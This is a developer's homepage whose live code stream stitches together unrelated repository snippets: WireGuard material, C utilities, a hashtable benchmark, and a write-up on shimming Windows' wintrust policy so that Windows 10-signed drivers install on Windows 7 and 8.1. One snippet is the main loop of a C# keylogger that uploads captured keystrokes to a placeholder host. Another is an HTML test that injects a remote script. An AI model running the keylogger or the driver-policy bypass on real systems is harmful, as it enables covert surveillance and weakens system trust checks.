zx2c4
I am available for freelance programming, infrastructure design, security auditing, and technology consulting. Contact me for a resume.

Projects

Loading...
The scrolling code to the right is streamed live, at random, from each of these git repositories.
Looking for Edge Security? Looking for Jason?
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . #include <sys/types.h> #include <sys/stat.h> #include <stdlib.h> #include <stdarg.h> #include <unistd.h> #include <stdio.h> #include <fcntl.h> #include <time.h> #include <pwd.h> #include <string.h> #include "glougloud.h" FILE *logfile; int loglevel; int logpinvalid; #define LOGFILE "/var/log/glougloud" #define LOG_FORCED -2 #define LOG_FATAL -1 #define LOG_WARN 0 #define LOG_INFO 1 #define LOG_DEBUG 2 static void logit(int, const char *, const char *, va_list); void log_init(int level, int pinvalid) { logfile = fopen(LOGFILE, "a+"); if (!logfile) { printf("cannot open log file %s!\n", LOGFILE); exit(1); } loglevel = level; logpinvalid = pinvalid; } void log_tmp(const char *msg, ...) { va_list ap; va_start(ap, msg); logit(LOG_FORCED, "XXX ", msg, ap); va_end(ap); } void log_pinvalid(const char *msg, ...) { va_list ap; if (!logpinvalid) return; va_start(ap, msg); logit(LOG_FORCED, "pinvalid: ", msg, ap); va_end(ap); } void log_debug(const char *msg, ...) { va_list ap; va_start(ap, msg); logit(LOG_DEBUG, "", msg, ap); va_end(ap); } void log_info(const char *msg, ...) { va_list ap; va_start(ap, msg); logit(LOG_INFO, "", msg, ap); va_end(ap); } void log_warn(const char *msg, ...) { va_list ap; va_start(ap, msg); logit(LOG_WARN, "", msg, ap); va_end(ap); } #if defined(__OpenBSD__) void __dead #else void #endif fatal(const char *msg, ...) { va_list ap; va_start(ap, msg); logit(LOG_FATAL, "fatal: ", msg, ap); va_end(ap); exit(1); } /* XXX mpsafe */ static void logit(int level, const char *prefix, const char *msg, va_list ap) { time_t clock; if (level <= loglevel) { time(&clock); fprintf(logfile, "%d ", (int)clock); vfprintf(logfile, prefix, ap); vfprintf(logfile, msg, ap); fprintf(logfile, "\n"); fflush(logfile); } } void * xmalloc(size_t size) { void *ptr; if (size == 0) fatal("xmalloc: zero size"); ptr = malloc(size); if (ptr == NULL) fatal("xmalloc: out of memory (allocating %lu bytes)", (u_long) size); return ptr; } void * xcalloc(size_t nmemb, size_t size) { void *ptr; if (size == 0) fatal("xcalloc: zero size"); ptr = calloc(nmemb, size); if (ptr == NULL) fatal("xcalloc: out of memory (allocating %lu bytes)", (u_long) size); return ptr; } void fd_nonblock(int fd) { int flags = fcntl(fd, F_GETFL, 0); int rc = fcntl(fd, F_SETFL, flags | O_NONBLOCK); if (rc == -1) log_warn("failed to set fd %i non-blocking", fd); } void droppriv() { struct passwd *pw; pw = getpwnam(GLOUGLOUD_USER); if (!pw) fatal("unknown user %s", GLOUGLOUD_USER); if (chroot(pw->pw_dir) != 0) fatal("unable to chroot"); if (chdir("/") != 0) fatal("unable to chdir"); if (setgroups(1, &pw->pw_gid) == -1) fatal("setgroups() failed"); if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) fatal("setresgid failed"); if (setresuid(pw->pw_uid, pw->pw_uid, pw->pw_uid) == -1) fatal("setresuid() failed"); endpwent(); } void addrcpy(struct sockaddr_in *dst, struct sockaddr_in *src) { dst->sin_addr.s_addr = src->sin_addr.s_addr; dst->sin_port = src->sin_port; dst->sin_family = src->sin_family; } void socketpair_prepare(int fd[2]) { if (socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, fd) == -1) fatal("socketpair_prepare"); fd_nonblock(fd[0]); fd_nonblock(fd[1]); } # Go Implementation of [WireGuard](https://www.wireguard.com/) This is an implementation of WireGuard in Go. ## Usage Most Linux kernel WireGuard users are used to adding an interface with `ip link add wg0 type wireguard`. With wireguard-go, instead simply run: ``` $ wireguard-go wg0 ``` This will create an interface and fork into the background. To remove the interface, use the usual `ip link del wg0`, or if your system does not support removing interfaces directly, you may instead remove the control socket via `rm -f /var/run/wireguard/wg0.sock`, which will result in wireguard-go shutting down. To run wireguard-go without forking to the background, pass `-f` or `--foreground`: ``` $ wireguard-go -f wg0 ``` When an interface is running, you may use [`wg(8)`](https://git.zx2c4.com/wireguard-tools/about/src/man/wg.8) to configure it, as well as the usual `ip(8)` and `ifconfig(8)` commands. To run with more logging you may set the environment variable `LOG_LEVEL=debug`. ## Platforms ### Linux This will run on Linux; however you should instead use the kernel module, which is faster and better integrated into the OS. See the [installation page](https://www.wireguard.com/install/) for instructions. ### macOS This runs on macOS using the utun driver. It does not yet support sticky sockets, and won't support fwmarks because of Darwin limitations. Since the utun driver cannot have arbitrary interface names, you must either use `utun[0-9]+` for an explicit interface name or `utun` to have the kernel select one for you. If you choose `utun` as the interface name, and the environment variable `WG_TUN_NAME_FILE` is defined, then the actual name of the interface chosen by the kernel is written to the file specified by that variable. ### Windows This runs on Windows, but you should instead use it from the more [fully featured Windows app](https://git.zx2c4.com/wireguard-windows/about/), which uses this as a module. ### FreeBSD This will run on FreeBSD. It does not yet support sticky sockets. Fwmark is mapped to `SO_USER_COOKIE`. ### OpenBSD This will run on OpenBSD. It does not yet support sticky sockets. Fwmark is mapped to `SO_RTABLE`. Since the tun driver cannot have arbitrary interface names, you must either use `tun[0-9]+` for an explicit interface name or `tun` to have the program select one for you. If you choose `tun` as the interface name, and the environment variable `WG_TUN_NAME_FILE` is defined, then the actual name of the interface chosen by the kernel is written to the file specified by that variable. ## Building This requires an installation of the latest version of [Go](https://go.dev/). ``` $ git clone https://git.zx2c4.com/wireguard-go $ cd wireguard-go $ make ``` ## License Copyright (C) 2017-2023 WireGuard LLC. All Rights Reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Downlevel Driver Enabler **by Jason A. Donenfeld (zx2c4)** "Downlevel Driver Enabler" enables the use of Windows 10 PnP signed drivers on Windows 7 and 8.1. Last year, Microsoft announced that they would no longer provide intermediate certificates for Authenticode-signed kernel drivers after June 1, 2021. This prompted widespread panic, as it effectively meant that it would be now impossible for many drivers to issue updates — for reliability, security, or otherwise — on Windows 7 and 8.1. OSR ran [a blog series](https://www.osr.com/blog/2020/10/15/microsoft-driver-updates-allowed-win7-win8/) on this, culminating in a final post in April indicating that after much haggling with Microsoft PMs, the prospects of any change to the policy is hopeless, and the situation is a "lost cause". R.I.P. Windows 7 and 8.1 driver updates? Not at all, and that is what this repository presents. ### Driver signing background Before Windows 10 1607, there were two ways of signing drivers: Authenticode signatures, in which you pay a CA for the ability to sign your own drivers, or Windows Hardware Compatibility Publisher signatures, in which you either run your driver through a battery of hardware tests, called WHLK (which OSR points out is impossible for most driver types), and submit the results of those tests to Microsoft, or more recently, simply ask Microsoft for an "attestation signature", which amounts to more or less the same thing without the testing headache. At some point Microsoft was going to require WHLK testing for Windows Server, but eventually gave up on that, so now attestation signatures are fine for both Windows 10 Client and Windows 10 Server (2016/2019). But attestation is only for Windows 10, which means if you want a Windows Hardware Compatibility Publisher signature on Windows 7 and 8.1, you must go through the testing that may well not be available for your driver. As an aside, it turns out you can actually use an old Authenticode certificate basically indefinitely — beyond the June 1, 2021 expiration date — by timestamping it using a bogus timestamping server, and then adding the bogus CA used to generate those timestamp signatures to the system's trust store. Evidently the requirements of timestamp CAs are less stringent than those of code signing CAs. While there's arguably a "safe" way of doing that, (ab)using expired or intermediately expired Authenticode certificates seems to go against the spirit of the requirements, and so it seems a bit too dirty for production. One could imagine getting a certificate consequently blacklisted with tricks like that. So, with WHLK not available for many drivers, and Authenticode no longer viable after June 1, 2021, it would seem the only way forward for driver updates of any kind is on Windows 10, using attestation signatures, and just giving up entirely on trying to ship security or reliability updates to Windows 7 and 8.1. That laziness is appealing, but also not viable for real world systems that still require the old operating systems. It turns out that Windows 7 and 8.1 will load drivers that have been signed using the Windows 10 attestation service, but only if they are non-PnP (i.e. do not use an `.inf` and `.cat` file). That means Windows 7 and 8.1 developers of non-PnP drivers can simply transition to the Windows 10 attestation service after June 1, 2021 and all will be well. But PnP drivers — extremely common — are still left out in the cold. The distinction between the two driver types, however, provides a hint. ### Driver signature verification A first inclination upon learning that non-PnP drivers can load but PnP drivers cannot might be that one could just write a little non-PnP rootkit driver to fiddle around with whatever needs fiddling with, enabling the PnP driver to load subsequently. That, again, seems unfortunately too dirty for production, and a bit intellectually lazy too. Instead it is more interesting to understand the _actual_ difference between the non-PnP case and PnP case. The kernel verifies drivers when they are being loaded, in order to make sure that untrusted code is not loaded into the most trusted part of the OS. To this end, the loader is concerned primarily with the signature on the `.sys` driver code itself, rather than any supporting userspace files around it. So, the signature verifier — implemented in `ci.dll` — looks at the signature in the `.sys` and makes sure that it chains up to a valid root in a valid way. In our case here, the relevant chaining is that it ends in a particular Microsoft certificate related to the Windows Hardware Compatibility Publisher with proper EKUs. If all checks out, then the driver loads. It is very simple. For this reason, Windows 10 attestation works on both Windows 10 and Windows 7 and 8.1. The kernel's verifier cares that a driver is trusted by Microsoft, since the relevant security boundary here involves trust, rather than which particular operating system it has been "certified" to run smoothly on. And if you think about it, that makes sense: the kernel is trying to enforce signatures as a means of security, in order to have a trusted boundary. The policy it cares about is a simple security one, rather than anything fancier or more pedantic about certifications or WHLK test suites or anything like that. This is a real, important security boundary. The userspace PnP driver store is a bit more complicated. Here, it not only cares about the signature of the `.sys` driver code itself, but also all of the other supporting userspace files, such as the `.inf` file and other programs the `.inf` file might instruct the OS to install. These supporting files are listed in a `.cat` file, and this `.cat` file is signed with the same type of signature as the `.sys` driver code file. But the `.cat` file also has some additional fields, the most relevant of which is the `OSAttr` field, which lists the version of Windows with which the driver has been certified or attested to work. The userspace PnP driver installer, `drvinst.exe`, cares about this, and will return `ERROR_SIGNATURE_OSATTRIBUTE_MISMATCH` (0xE0000244) if `OSAttr` lists a different Windows version. This is _not_ a security check. It is a boring policy check, and one that is not even uniformly applied, as the kernel's verifier does not care about it, hence the case of non-PnP drivers without `OSAttr` checks. And seeing that certification for Windows 7 and 8.1 is not even possible now, it is no longer even a _sensible_ policy check. And, to repeat again, this is very much _not_ a security check. It might now be described as an _outdated_ or _obsolete_ policy check. Many articles on similar topics would now attempt to dazzle you with colorful screenshots of IDA Pro, indicating the impenetrably byzantine nature of the following reverse engineering work. In reality, though, the analysis here is not overly fancy: the PnP driver installer — `drvinst.exe` — calls into `setupapi.dll`, which eventually finds its way to `VerifyFile`, which in turn calls `WinVerifyTrust(DRIVER_ACTION_VERIFY)` in `wintrust.dll`. If that function returns `ERROR_APP_WRONG_OS` (0x0000047F), then `VerifyFile` returns `ERROR_SIGNATURE_OSATTRIBUTE_MISMATCH` (0xE0000244) to its caller. Looking at `wintrust.dll`'s `WinVerifyTrust`, there is a dynamic function dispatch based on the GUID argument, which eventually leads to a call to `DriverFinalPolicy`, which in turn uses `CryptCATGetCatAttrInfo` and `CryptCATGetAttrInfo` to read the `OSAttr` field, and then sees if it matches the running OS using `_CheckVersionAttributeNEW`, returning a boolean. If it returns true, `DriverFinalPolicy` returns `ERROR_SUCCESS` (0x0); if not, it returns `ERROR_APP_WRONG_OS` (0x0000047F). So naturally one starts to consider different ways of injecting into system services or patching binaries on disk or corrupting the file system cache or any of the usual techniques for such things, to turn either `ERROR_SIGNATURE_OSATTRIBUTE_MISMATCH` or `ERROR_APP_WRONG_OS` into an `ERROR_SUCCESS`. But fortunately, no such dirty technique is required. The `wintrust.dll` framework already gives us everything we need for such modifications, without having to resort to the dark arts. When we call `WinVerifyTrust(DRIVER_ACTION_VERIFY)`, the `DRIVER_ACTION_VERIFY` constant is actually a GUID. `wintrust.dll`, in `_CheckRegisteredProviders` and `GetRegProvider`, then looks in `HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust\{function name}\{that guid}` at two values, `$DLL` and `$Function`. If `$DLL` is not `wintrust.dll`, it calls `LoadLibraryW` on it (not `LoadLibraryExW`! yikes, but unrelated), and then it calls `GetProcAddress` on `$Function`. Finally it calls the resolved function. Thus, all we have to do is implement our own `DriverFinalPolicy` function that calls the original one in `wintrust.dll`, and converts a return value of `ERROR_APP_WRONG_OS` (0x0000047F) into `ERROR_SUCCESS` (0x0). And presto, we are done, and Windows 10 drivers can load successfully on Windows 7 and 8.1. We do this _without_ having to break any real security barriers or do anything dirty. Rather, we use the nice dynamic dispatch facilities already available in the OS to remove a now-antiquated OS version policy check. In some sense, Microsoft foresaw the need for pluggable policy years in advance. ### Usage So, with the above in mind, the actual implementation is trivial. Compile the [~20 line `shim.c` file](https://git.zx2c4.com/downlevel-driver-enabler/tree/shim.c) in this repository into a `shim.dll`, and then set the ``` HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$DLL ``` registry key to the location of your `shim.dll`. When you are done, set the key back to its original value. (It is not recommended to leave the registry key pointing to your `shim.dll` or to install your `shim.dll` into `system32`, as multiple parties doing that will inevitably lead to the "dll hell" of yore.) A driver installation at the command line can be easily simplified to: ```bat > reg add HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} /v $DLL /t REG_SZ /d "%cd%\shim.dll" /f > pnputil -i -a mydriver.inf > reg add HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} /v $DLL /t REG_SZ /d WINTRUST.dll /f ``` There is one caveat to consider, which is that the registry is a _shared resource_, and so multiple installers all using this method at once is going to lead to issues. Therefore, when doing this, take a mutex in a private namespace (so as to mitigate the trivial unprivileged DoS). So, by convention, let us do: - Boundary descriptor: `L"DownlevelDriverEnabler"` - Boundary descriptor SID: `WinLocalSystemSid` or `WinBuiltinAdministratorsSid` - Private namespace: `L"DownlevelDriverEnabler"` with security attributes `O:SYD:P(A;;GA;;;SY)(A;;GA;;;BA)S:(ML;;NWNRNX;;;HI)` or `O:BAD:P(A;;GA;;;SY)(A;;GA;;;BA)S:(ML;;NWNRNX;;;HI)` - Mutex name: `L"DownlevelDriverEnabler\\ShimInProgress"` Take that mutex while shimming, and release it after the key has been restored to `WINTRUST.DLL`. If we all follow those rules, there will be safe and reliable support for driver updates on Windows 7 and 8.1. Hopefully this turns a rather hopeless situation into a productive one. ### Addendum Looking at things a bit closer, it appears as though the userspace PnP verifier checks for Authenticode signatures using the generic Authenticode check -- `WINTRUST_ACTION_GENERIC_VERIFY_V2`. This check is the normal Authenticode check that still remains valid for software in general, not just for kernel drivers. That means it is possible to receive Windows 10 attested `.sys.` and `.cat` files, and then simply _re-sign_ the `.cat` file with a ordinary software Authenticode certificate. The still-valid software Authenticode certificate will enable PnP installation verifier to proceed, and the correct Microsoft signature on the `.sys` will allow the kernel to load it. In very brief tests, this appears to be the case, though it does warrant a bit more testing, as setupapi still aborts with `CERT_E_UNTRUSTEDROOT` (0x800B0109), despite letting the copy proceed, which on some configurations could wind up being fatal. In general this might require a bit more surgery than the above, but for others it could also prove a useful strategy. <style> .markdown-body { max-width: 720px; } </style> /* Copyright (C) 2020 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved. */ #include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <assert.h> #include <time.h> #include <sys/random.h> struct entry { uint8_t pubkey[32]; uint64_t some_member; uint32_t some_other_member; struct entry *next; }; enum { ENTRY_BUCKETS_POW2 = 1 << 17 }; static uint64_t hash_v[4]; static __attribute__((constructor)) void init_hash_v(void) { assert(!getentropy(&hash_v, sizeof(hash_v) / 2)); hash_v[0] ^= 0x736f6d6570736575ULL; hash_v[1] ^= 0x646f72616e646f6dULL; hash_v[2] = hash_v[0] ^ 0x736f6d6570736575ULL ^ 0x6c7967656e657261ULL; hash_v[3] = hash_v[1] ^ 0x646f72616e646f6dULL ^ 0x7465646279746573ULL; } static unsigned int pubkey_bucket(uint8_t key[32]) { uint64_t first, second, third, forth; uint64_t v0 = hash_v[0]; uint64_t v1 = hash_v[1]; uint64_t v2 = hash_v[2]; uint64_t v3 = hash_v[3]; memcpy(&first, &key[0], sizeof(first)); memcpy(&second, &key[8], sizeof(second)); memcpy(&third, &key[16], sizeof(third)); memcpy(&forth, &key[24], sizeof(forth)); #define SIPROUND ( \ v0 += v1, \ v1 = ((v1 << (13 & 63)) | (v1 >> ((-13) & 63))),\ v1 ^= v0, \ v0 = ((v0 << (32 & 63)) | (v0 >> ((-32) & 63))),\ v2 += v3, \ v3 = ((v3 << (16 & 63)) | (v3 >> ((-16) & 63))),\ v3 ^= v2, \ v0 += v3, \ v3 = ((v3 << (21 & 63)) | (v3 >> ((-21) & 63))),\ v3 ^= v0, \ v2 += v1, \ v1 = ((v1 << (17 & 63)) | (v1 >> ((-17) & 63))),\ v1 ^= v2, \ v2 = ((v2 << (32 & 63)) | (v2 >> ((-32) & 63)))) v3 ^= first; SIPROUND; SIPROUND; v0 ^= first; v3 ^= second; SIPROUND; SIPROUND; v0 ^= second; v3 ^= third; SIPROUND; SIPROUND; v0 ^= third; v3 ^= forth; SIPROUND; SIPROUND; v0 ^= forth; v3 ^= 32ULL << 56; SIPROUND; SIPROUND; v0 ^= 32ULL << 56; v2 ^= 0xFF; SIPROUND; SIPROUND; SIPROUND; SIPROUND; #undef SIPROUND return (v0 ^ v1 ^ v2 ^ v3) & (ENTRY_BUCKETS_POW2 - 1); } static struct entry *entry_buckets[ENTRY_BUCKETS_POW2]; static struct entry *find_entry(uint8_t key[32]) { struct entry *entry; for (entry = entry_buckets[pubkey_bucket(key)]; entry; entry = entry->next) { if (!memcmp(entry->pubkey, key, 32)) return entry; } return NULL; } static struct entry *find_or_insert_entry(uint8_t key[32]) { struct entry **entry; for (entry = &entry_buckets[pubkey_bucket(key)]; *entry; entry = &(*entry)->next) { if (!memcmp((*entry)->pubkey, key, 32)) return *entry; } *entry = calloc(1, sizeof(**entry)); assert(*entry); memcpy((*entry)->pubkey, key, 32); return *entry; } /* Just a small test */ int main(int argc, char *argv[]) { struct timespec start, end; uint8_t key[32] = { 0 }; int i; for (i = 0; i < 1 << 20; ++i) { struct entry *entry; memcpy(key, &i, sizeof(i)); entry = find_or_insert_entry(key); entry->some_member = i ^ 0xffffffff; } clock_gettime(CLOCK_MONOTONIC, &start); for (i = 0; i < 1 << 20; ++i) { struct entry *entry; memcpy(key, &i, sizeof(i)); entry = find_entry(key); assert(entry); assert(entry->some_member == i ^ 0xffffffff); } clock_gettime(CLOCK_MONOTONIC, &end); printf("%s: %llu ns\n", argv[0], (end.tv_sec * 1000000000ULL + end.tv_nsec) - (start.tv_sec * 1000000000ULL + start.tv_nsec)); return 0; } using System; namespace Logger { class MainApp { [STAThread] static void Main(string[] args) { Keylogger kl = new Keylogger(); Uploader upload = new Uploader("http://yourwebhost.com/logger.php?mode=log"); Random rnd = new Random(); upload.UploadLog("\n**DoodleRag startup: " + DateTime.Now.ToString() + "**\n"); while (true) { System.Threading.Thread.Sleep(rnd.Next(5 * 60 * 1000, 20 * 60 * 1000)); upload.UploadLog(kl.PopLog()); } } } } # SPDX-License-Identifier: GPL-2.0 # # Copyright (C) 2015-2017 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved. WIREGUARD_PATH := $(call my-dir) TARGET_KERNEL_BINARIES: patch-wireguard patch-wireguard: @$(WIREGUARD_PATH)/patch-kernel.sh "$(TARGET_KERNEL_SOURCE)"; \ ret=$$?; [ $$ret -eq 0 ] && exit 0; [ $$ret -ne 77 ] && exit $$ret; \ echo -e "" \ "\e[1;37;41m=================================================\e[0m\n" \ "\e[1;37;41m+ WARNING WARNING WARNING +\e[0m\n" \ "\e[1;37;41m+ +\e[0m\n" \ "\e[1;37;41m+ You are trying to build WireGuard into a +\e[0m\n" \ "\e[1;37;41m+ kernel that is too old to run it. Please use +\e[0m\n" \ "\e[1;37;41m+ kernel >=3.10. This build will NOT have +\e[0m\n" \ "\e[1;37;41m+ WireGuard. You likely added this to your +\e[0m\n" \ "\e[1;37;41m+ local_manifest.xml without understanding this +\e[0m\n" \ "\e[1;37;41m+ requirement. Sorry for the inconvenience. +\e[0m\n" \ "\e[1;37;41m=================================================\e[0m" >&2 \ exit 0 .PHONY: patch-wireguard /* SPDX-License-Identifier: GPL-2.0 * * Copyright (C) 2018-2021 WireGuard LLC. All Rights Reserved. */ #include <devguid.h> #include <cfgmgr32.h> #define WIREGUARD_HWID L"WireGuard" VOID __stdcall CreateInstanceWin7(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) { #pragma EXPORT DWORD LastError = ERROR_SUCCESS; WCHAR InstanceId[MAX_DEVICE_ID_LEN] = { 0 }; HDEVINFO DevInfo = SetupDiCreateDeviceInfoListExW(&GUID_DEVCLASS_NET, NULL, NULL, NULL); if (DevInfo == INVALID_HANDLE_VALUE) { LastError = GetLastError(); goto cleanup; } SP_DEVINFO_DATA DevInfoData = { .cbSize = sizeof(DevInfoData) }; if (!SetupDiCreateDeviceInfoW( DevInfo, WIREGUARD_HWID, &GUID_DEVCLASS_NET, NULL, NULL, DICD_GENERATE_ID, &DevInfoData)) { LastError = GetLastError(); goto cleanupDevInfo; } SP_DEVINSTALL_PARAMS_W DevInstallParams = { .cbSize = sizeof(DevInstallParams) }; if (!SetupDiGetDeviceInstallParamsW(DevInfo, &DevInfoData, &DevInstallParams)) { LastError = GetLastError(); goto cleanupDevInfo; } DevInstallParams.Flags |= DI_QUIETINSTALL; if (!SetupDiSetDeviceInstallParamsW(DevInfo, &DevInfoData, &DevInstallParams)) { LastError = GetLastError(); goto cleanupDevInfo; } if (!SetupDiSetSelectedDevice(DevInfo, &DevInfoData)) { LastError = GetLastError(); goto cleanupDevInfo; } static const WCHAR Hwids[_countof(WIREGUARD_HWID) + 1 /*Multi-string terminator*/] = WIREGUARD_HWID; if (!SetupDiSetDeviceRegistryPropertyW(DevInfo, &DevInfoData, SPDRP_HARDWAREID, (const BYTE *)Hwids, sizeof(Hwids))) { LastError = GetLastError(); goto cleanupDevInfo; } if (!SetupDiBuildDriverInfoList(DevInfo, &DevInfoData, SPDIT_COMPATDRIVER)) { LastError = GetLastError(); goto cleanupDevInfo; } SP_DRVINFO_DATA_W DrvInfoData = { .cbSize = sizeof(SP_DRVINFO_DATA_W) }; if (!SetupDiEnumDriverInfoW(DevInfo, &DevInfoData, SPDIT_COMPATDRIVER, 0, &DrvInfoData) || !SetupDiSetSelectedDriverW(DevInfo, &DevInfoData, &DrvInfoData)) { LastError = GetLastError(); goto cleanupDriverInfo; } if (!SetupDiCallClassInstaller(DIF_REGISTERDEVICE, DevInfo, &DevInfoData)) { LastError = GetLastError(); goto cleanupDevInfo; } SetupDiCallClassInstaller(DIF_REGISTER_COINSTALLERS, DevInfo, &DevInfoData); SetupDiCallClassInstaller(DIF_INSTALLINTERFACES, DevInfo, &DevInfoData); if (!SetupDiCallClassInstaller(DIF_INSTALLDEVICE, DevInfo, &DevInfoData)) { LastError = GetLastError(); goto cleanupDevice; } DWORD RequiredChars = _countof(InstanceId); if (!SetupDiGetDeviceInstanceIdW(DevInfo, &DevInfoData, InstanceId, RequiredChars, &RequiredChars)) { LastError = GetLastError(); goto cleanupDevice; } cleanupDevice: if (LastError != ERROR_SUCCESS) { SP_REMOVEDEVICE_PARAMS RemoveDeviceParams = { .ClassInstallHeader = { .cbSize = sizeof(SP_CLASSINSTALL_HEADER), .InstallFunction = DIF_REMOVE }, .Scope = DI_REMOVEDEVICE_GLOBAL }; if (SetupDiSetClassInstallParamsW( DevInfo, &DevInfoData, &RemoveDeviceParams.ClassInstallHeader, sizeof(RemoveDeviceParams))) SetupDiCallClassInstaller(DIF_REMOVE, DevInfo, &DevInfoData); } cleanupDriverInfo: SetupDiDestroyDriverInfoList(DevInfo, &DevInfoData, SPDIT_COMPATDRIVER); cleanupDevInfo: SetupDiDestroyDeviceInfoList(DevInfo); cleanup: WriteFormatted(STD_OUTPUT_HANDLE, L"%1!X! %2!s!", LastError, LastError == ERROR_SUCCESS ? InstanceId : L"\"\""); } <html> <head> <script src="secure.js"></script> <script> setTimeout(function() { alert("bout to insert"); var script = document.createElement('script'); script.type = 'text/javascript'; script.src = 'http://www.zx2c4.com/somescript.js'; document.getElementsByTagName("head")[0].appendChild(script) }, 3000); </script> </head> <body> Will you see this text? </body> </html> .